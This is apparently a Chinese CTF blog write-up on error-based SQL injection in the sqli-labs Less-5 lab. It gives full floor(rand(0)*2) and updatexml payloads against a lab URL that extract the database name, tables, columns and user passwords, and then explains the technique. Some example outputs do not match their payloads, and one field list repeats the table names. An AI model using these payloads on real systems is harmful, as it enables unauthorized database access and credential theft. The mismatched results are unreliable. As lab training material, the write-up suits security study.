【CTF-WEB-SQL】SQL注入基本流程-错误注入(sql-labs的Less5)(updatexml)

print_Hyon2025-07-27 13:19

针对 Less-5 的实战利用

步骤一:获取数据库名
方法一:
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
union select 1, count(*), 
concat(
  (select database()), 
  '---', 
  floor(rand(0)*2)
) as a 
from information_schema.tables 
group by a --+

结果示例:

text 复制代码 
Duplicate entry 'security---1' for key 'group_key'

✅ 数据库名 = security

方法二:
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) --+

结果示例:

text 复制代码 
XPATH syntax error: '~security~'

✅ 数据库名 = security

步骤二:获取所有表名
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
  select group_concat(table_name) 
  from information_schema.tables 
  where table_schema=database()
), 0x7e), 1) --+

结果示例:

text 复制代码 
Duplicate entry 'emails,referers,uagents,users---0' for key 'group_key'

✅ 表名 = emails, referers, uagents, users

步骤三:获取字段名(以users表为例)
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
), 0x7e), 1) --+

结果示例:

text 复制代码 
XPATH syntax error: '~id,username,password~'

✅ 字段 = emails,referers,uagents,users

步骤四:拖取敏感数据
sql 复制代码 
http://223.112.39.132:46157/Less-5/?id=1' 
and updatexml(1, concat(0x7e, (
  select group_concat(username,':',password) 
   from users
), 0x7e), 1) --+

结果示例:

sql 复制代码 
Duplicate entry 'Dumb:Dumb,Angelina:I-kill-you,...---0' for key 'group_key'

✅ 用户名密码 = Dumb:Dumb, Angelina:I-kill-you, ...

为什么这个方法在Less-5有效?

  1. 漏洞特性

    • 页面不显示查询结果,但显示SQL错误信息
    • rand(0)的确定性序列是触发报错的关键

  2. 优势对比

    方法 请求次数 速度 复杂度
    布尔盲注 数百次
    时间盲注 数百次 极慢
    报错注入 1次 即时

  3. 防御绕过

    即使应用不返回查询结果,只要泄露错误信息,此方法就有效

报错注入原理分析(针对您的Payload)

sql 复制代码 
?id=1' 
union select 1, count(*), 
concat(
  (select database()),  -- 获取数据库名
  '---', 
  floor(rand(0)*2)      -- 生成随机数0或1
) as a 
from information_schema.tables 
group by a --+

关键技术点floor

  1. floor(rand(0)*2)

    • 固定种子0rand()会生成可预测序列:0,1,1,0,1,1...
    • floor(rand(0)*2) 结果序列:0,1,1,0,1,1...

  2. group by + count(*)

    • 当使用group by对虚拟列a分组时:
      • 首次遇到新值 → 建立新分组
      • 再次遇到相同值 → 增加计数
    • 关键漏洞 :MySQL 在建立分组时先计算rand()值再判断是否存在分组

  3. 触发报错的流程

    行号 rand() 操作 结果
    1 0 创建分组 dbname---0 成功
    2 1 创建分组 dbname---1 成功
    3 1 增加分组 dbname---1计数 成功
    4 0 尝试增加分组 dbname---0计数 ⚠️ 但此时分组未创建(rand()序列特性)→ 报错

  4. 报错信息泄露数据

    错误消息会包含导致冲突的虚拟列值:

    sql 复制代码 
    Duplicate entry 'security---0' for key 'group_key'

    其中 security 就是数据库名!

相关推荐
希望奇迹很安静5 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
Safe network access1 天前
2023江苏省第二届数据安全技能大赛决赛题
安全·ctf
uwvwko3 天前
使用docker(ubuntu)搭建web环境(php,apahce2)
ubuntu·docker·php·web·ctf·apache2
码农12138号5 天前
BUUCTF在线评测-练习场-WebCTF习题[BSidesCF 2020]Had a bad day1-flag获取、解析
web安全·网络安全·ctf·buuctf·文件包含漏洞
uwvwko6 天前
安装kali时出现“安装步骤失败“如何解决及后续软件安装
linux·运维·服务器·安全·kali·ctf
诗人不说梦^9 天前
[MRCTF2020]Ezpop
web·ctf
baynk9 天前
wireshark的常用用法
网络·测试工具·wireshark·ctf
诗人不说梦^9 天前
[BJDCTF2020]Mark loves cat
web·ctf
码农12138号10 天前
BUUCTF在线评测-练习场-WebCTF习题[RoarCTF 2019]Easy Java1-flag获取、解析
java·web安全·网络安全·ctf·buuctf·任意文件下载漏洞
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02全球最强模型Grok4,国内已可免费使用!(附教程)03vue数据变化但页面不变04KGG转MP3工具|非KGM文件|解密音频05扣子开源本地部署教程 丨Coze智能体小白喂饭级指南06干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!07【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致08ChatGPT Agent 完全使用指南:2025年7月最新功能详解09《魔兽世界》提示lua警告的含义及解决方法10这次领先Cursor!体验了Trae 2.0 SOLO 模式,超酷!